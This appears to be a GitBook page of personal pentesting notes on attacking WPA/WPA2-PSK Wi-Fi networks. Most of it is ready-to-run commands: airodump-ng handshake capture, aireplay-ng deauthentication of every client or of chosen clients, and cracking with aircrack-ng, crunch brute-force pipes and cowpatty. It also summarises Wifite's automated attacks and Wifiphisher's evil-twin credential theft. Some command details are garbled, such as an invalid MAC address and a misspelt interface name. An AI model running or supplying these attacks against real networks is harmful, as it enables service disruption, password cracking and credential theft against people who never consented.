Wi-fi hacking
  • MDK4
  • Deauth forced
  • Aircrack-ng
  • Aircrack-ng (teste)
  • Wifite + Reaver
  • Cheatsheet_Wireless
  • WiFi Penetration Testing Guide
  • De-authentication
  • Disassociation Packets
  • Beacon Flooding
  • Authentication Denial-Of-Service
  • SSID Probing and Bruteforcing
  • EAPOL Start and Logoff Packet Injection
  • Attacks for IEEE 802.11s mesh networks
  • WIDS Confusion
  • WEP
  • WPA/WPA2 - PSK
Powered by GitBook
On this page
  • Handshake Capture
  • Intro & Concept
  • WPA Cracking
  • Resources
  • Wifite
  • Wifiphisher
  • wificraK

WPA/WPA2 - PSK

Handshake Capture

Intro & Concept

  • One way to attack Wi-Fi networks (WPA/WPA2) is by capturing a handshake from an authentication or just passively waiting for it.

  • Now in order to capture this you will need to have the AP ESSID or the BSSID, and the channel that is listening to your AP to start capturing/listening packets around that specific router.

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

  • Now you have two options, wait for your client to connect the AP you are trying to break in, or make some active attack, I always prefer the second option. You need to make a de-authentication attack to "deauthenticate" a client or just make a de-auth of all clients.

aireplay-ng -0 0 -e 'AP_name' -c 'FF:FF:FF:FF:FF:FF' wlan0mon #Send de-auth packets to broadcast address, de-auth all-clientsaireplay-ng -0 0 -e 'AP_name' -c '8d:02:03:2d:cf:ws' wlan0mom #De-auth specific client's

WPA Cracking

Now check if the handshake is in the file.

aircrack-ng

aircrack-ng psk-01.cap

Crunch

Try all {upperlowercases with all numbers} with a lenght of 8 spaces/characters :crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - <Capture> -e <essid>Try all posible number combinations:crunch 8 8 1234567890 | aircrack-ng -w - <Capture> -e <essid>

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -Now continue to crack:aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Resources

Wifite

This tool gets the closest AP and start attacking it, just using one single command. The attacks that automate are:

  • WEP (Launches WEP attacks)

  • WPA/WPA2 - PSK

    • The Capture of the WPA Handshake

    • PMKID attacks (remember, to be successful with it, the AP need to have roaming mode on)

    • WPS

      • Pixie dust attack and the brute force attack (Can take a long time so get that in mind)

      • If PMKID or Handshake, the tool tries to brute forced with a top5000 passwords wordlist.

Wifiphisher

Performs Evil Twin attacks to get the password of the AP or Capture credentials from people nearby that connects to your malicious AP.

wificraK

This is my own wifi hacking tool that I created, it automates the process of the WPA handshake capture. Easy to use.

PreviousWEP

Last updated 1 year ago

LogoGitHub - derv82/wifiteGitHub
LogoGitHub - wifiphisher/wifiphisher: The Rogue Access Point FrameworkGitHub
LogoGitHub - j4ckris1337/WiSec: A tool for WI-FI penetration testing that automates your attacking processes.GitHub
Page cover image